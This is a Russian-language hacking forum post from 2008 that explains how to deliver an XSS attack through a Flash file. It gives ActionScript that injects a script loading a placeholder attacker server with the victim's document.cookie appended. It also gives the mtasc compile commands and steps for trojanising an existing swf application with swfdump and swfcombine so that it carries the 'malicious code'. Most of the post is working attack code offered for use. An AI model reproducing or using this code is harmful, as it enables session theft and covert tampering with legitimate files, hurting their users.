
30.05.2008, 23:46
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
Сообщение от SeeJay
И еще вопрос (извините, если замучил)…
Насколько я понимаю данный баг надо впихивать через флешку (swf)??
Код:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
PHP код:
class hek{
function hek() {
}
static function main(mc) {
getURL("javascript:alert(document.cookie);");
}
}
Далее компилим
Код:
mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as
заливаем куда надо и всё собственно
Можно протроянить уже существующее swf приложение с помощью swfcombine из пака Swftools
Анализируем приложение в которое будем вживлять наш злостный кодес с помощью swfdump
компилим с нужными параметрами злобнокодес (а именно меняем флаг -header)
Код:
mtasc.exe -swf hek.swf -main -header x:y:z hek.as
x и y - размеры, z - частота кадров в секунду
и вживляем
Код:
swfcombine.exe -o hek_movie.swf -T hek.swf movie.swf
__________________
|
|
|